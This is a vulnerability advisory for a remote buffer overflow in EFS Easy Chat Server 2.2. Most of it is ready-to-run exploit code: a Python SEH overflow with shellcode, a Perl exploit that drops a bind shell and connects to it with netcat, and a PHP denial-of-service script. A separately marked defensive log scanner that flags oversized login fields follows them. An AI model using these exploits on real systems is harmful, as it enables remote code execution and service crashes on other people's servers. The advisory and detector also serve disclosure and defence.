Written by NetJackal
Wednesday, 04 March 2009 22:17
EFS Software Easy Chat Server Authentication Request Handling Remote Buffer Overflow Vulnerability

Bugtraq ID: 25328
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Aug 14 2007 12:00AM
Updated: Mar 04 2009 05:46PM
Credit: NetJackal
Vulnerable: EFS Software Easy Chat Server 2.2
Discussion
Easy Chat Server is prone to a remote buffer-overflow vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Easy Chat Server 2.2 is reported vulnerable; other versions may also be affected.

Exploit(s)/PoC(s)
Attackers can use a browser to exploit this issue.
A proof of concept and exploits are available:
===============================================================
25328.py
^^^^^^^^^
#!/usr/bin/python
#[*] Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
#[*] Refer : http://www.milw0rm.com/exploits/4289
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ)

import struct
import socket

buf = "\x41"*216
buf += "\xEB\x06\xAE\xFA"  # jmp+6
buf += "\xB6\xB2\x01\x10"  # universal pop pop ret
buf += "\x90"*19

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf += (
    "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
    "\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
    "\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
    "\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
    "\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
    "\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
    "\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
    "\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
    "\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
    "\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba"
)

head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n"
head += "Host: 127.0.0.1\r\n"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "\r\n\r\n")
s.close()
===============================================================
25328-Dr4sH.pl
^^^^^^^^^^^^^^^
#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.milw0rm.com/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[......................................................]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# [*] Sending Diabolic request...
# [*] Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Easy Chat Server>
#
#[......................................................]
#
# Enjoy!
#

use IO::Socket;

print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n";

$host = shift || die "Usage: perl $0 <host>\n";

$junk = "\x90" x 208;
$jmp  = "\xEB\x06\xAE\xFA";
$ppr  = "\xB6\xB2\x01\x10";

$shellcode =
    "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x33\xc9\xb1".
    "\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x9c\x8f\x73".
    "\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x80\x55\x44".
    "\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x65\xb2\x06".
    "\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\xa1\x4e\x58".
    "\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x49\x1c\x03".
    "\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x34\xec\x57".
    "\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x5a\xe7\x60".
    "\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\xe4\x5d\x7b".
    "\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x74\xf5\xab".
    "\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\xee\xf7\xba".
    "\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x02\xa5\xc7".
    "\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\xe7\x84\x9c".
    "\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x80\x5d\x71".
    "\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x07\x99\x07".
    "\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x9e\x96\xa7".
    "\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\xec\xf5\x79".
    "\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\xbb\x57\xb3".
    "\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x32\xd9\xff".
    "\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x04\xdc\xbf".
    "\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\xc6\x01\x8d".
    "\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x31\x4b\xfd".
    "\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\xda\x80\x14";

$buffer = $junk.$jmp.$ppr.$shellcode;

$socket = IO::Socket::INET->new(PeerAddr=> $host, PeerPort=> '80', Proto=> 'tcp', Timeout=>'1')
    || die "[-] Unable to Connect.!\n";

print "[*] Sending Diabolic request...\n";

print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n";
print $socket "Host: $host\r\n\r\n\r\n";

close($socket);

print "[*] Connecting to bindshell $host:9999\n\n";

system("nc $host 9999");
===============================================================
easychat_dos.txt
^^^^^^^^^^^^^^^^^
<?php
##########################################################
###----------------------------------------------------###
###--------Easy Chat Server Remote DoS Exploit---------###
###----------------------------------------------------###
###-http://www.echatserver.com/------------------------###
###----------------------------------------------------###
###-Tested on version 2.2 [last version]-(XP SP2)------###
###----------------------------------------------------###
###-Usage:-php dos.php [TARGET] [PORT]-----------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

/*
Description:
Easy Chat Server has a built-in web server that lets users log in to the chat server.
The login page allows a maximum of 30 characters for Name and Password.
If an attacker supplies a longer Name and Password by editing the page or crafting
his own login request, the chat server will crash.
*/

echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
// Both TARGET and PORT are required, so fewer than three argv entries is a usage error.
if($argc<3)die("\nUsage: php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat('A',999);
echo "\nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die("\n$en: $es");
echo "\nConnected!";
echo "\nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
echo "\nWell done!\n";
?>
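All three PoCs above send oversized `username`/`password` values to `/chat.ghp`, well past the 30-character limit the login form enforces. The following detection check is an added example, not part of the original advisory or any of the PoCs: it scans web-server access-log lines (constructed sample lines in Common Log Format, an assumed logging setup) for login requests whose decoded field lengths exceed that limit, so a defender can spot both the overflow attempts and the DoS variant without relying on the server surviving the request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Values taken from the advisory: the login endpoint and the form's 30-character cap.
LOGIN_PATH = "/chat.ghp"
MAX_FIELD_LEN = 30
WATCHED_FIELDS = ("username", "password")

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y" (assumed log format).
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def oversized_login_fields(log_line, limit=MAX_FIELD_LEN):
    """Return {field: decoded_length} for watched login parameters longer than
    `limit` in a request to LOGIN_PATH; an empty dict means nothing suspicious."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return {}
    parts = urlsplit(m.group("target"))
    if parts.path != LOGIN_PATH:
        return {}
    # parse_qs percent-decodes, so padding sent as %41%41... is measured at its real length.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for field in WATCHED_FIELDS:
        for value in params.get(field, []):
            if len(value) > limit:
                hits[field] = max(hits.get(field, 0), len(value))
    return hits


def scan(lines, limit=MAX_FIELD_LEN):
    """Return [(line_index, hits)] for every log line that trips the check."""
    findings = []
    for i, line in enumerate(lines):
        hits = oversized_login_fields(line, limit)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample log lines: a normal login, a 216-byte padded username (raw and
# percent-encoded), a 999-byte username and password, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2009:22:17:01 +0000] "GET /chat.ghp?username=alice&password=s3cret&room=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Mar/2009:22:17:09 +0000] "GET /chat.ghp?username=' + "A" * 216 + '&password=ydw&room=2&ydw=2 HTTP/1.1" 500 0',
    '10.0.0.9 - - [04/Mar/2009:22:17:10 +0000] "GET /chat.ghp?username=' + "%41" * 216 + '&password=ydw&room=2 HTTP/1.1" 500 0',
    '10.0.0.9 - - [04/Mar/2009:22:17:12 +0000] "GET /chat.ghp?username=' + "A" * 999 + "&password=" + "A" * 999 + '&room=1&sex=2 HTTP/1.1" 500 0',
    '10.0.0.7 - - [04/Mar/2009:22:18:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG):
        print(f"line {idx}: oversized login fields {hits}")
```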
Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
References
Easy Chat Software Home Page (EFS Software): http://www.echatserver.com/index.ht